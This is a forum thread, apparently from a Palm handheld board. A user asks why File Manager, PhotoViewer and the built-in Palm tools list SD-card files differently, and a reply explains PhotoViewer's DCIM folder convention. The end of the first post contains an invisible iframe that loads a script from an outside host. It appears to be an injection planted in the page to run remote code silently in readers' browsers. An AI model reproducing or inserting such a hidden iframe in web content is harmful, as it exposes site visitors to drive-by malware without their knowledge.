+ Reply to Thread

Thread: File Manager?

File Manager?

I recently bought a 256 SD card and I'm having some issues working with the card and File Manager. Hopefully someone can provide some help. Here's my wishlist:

I copied an Application to the card via File Manager, File Manager processed it, but I could not see the App on the card. Conversely, I did the same thing using the standard Palm copy function and I was able to see it right away. First, is this normal and second, which is better for copying to a card, the standard Palm App or File Manager?

I downloaded some pictures onto the card via PhotoSuite Desktop and can view the pics perfectly by using PhotoSuite on the 7135 (and choosing the "card" option), however, if I try to view the pics through PhotoViewer I get a message that "there are no pictures on the card."

After I downloaded the pics, I can see that they are on the card if I go to the standard Palm delete function and choose the card option. However, in file manager, the individual pics are not listed anywhere. How would I delete these pics through File Manager or how would I even see them in File Manager? I guess the broader question is whehter through File Manager there is a way to view every individual file that is on the card?

I deleted some applications that I had moved onto the card by the standard Palm delete function (choosing the card option), however, when I went back into File Manager those files were still on the card (and just to make sure, I went back to the standard Palm App and the files were no longer on the card).

One thing to note is in all of the above cases I am certain that I was copying/deleting/viewing from the card and not on the internal device.

If for some reason the above is not normal and I wanted to start fresh, is there any harm in formatting the card in File Manager?

Thanks to anyone who can help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: File Manager?

Originally posted by RMSko

I downloaded some pictures onto the card via PhotoSuite Desktop and can view the pics perfectly by using PhotoSuite on the 7135 (and choosing the "card" option), however, if I try to view the pics through PhotoViewer I get a message that "there are no pictures on the card."

PhotoViewer is only for viewing JPG's which are in a directory on the card called DCIM which is hte standard location for SD capable digital cameras. PhotoSuite is for viewing pictures converted to PALM databases using the PhotoSuite Desktop.

Alan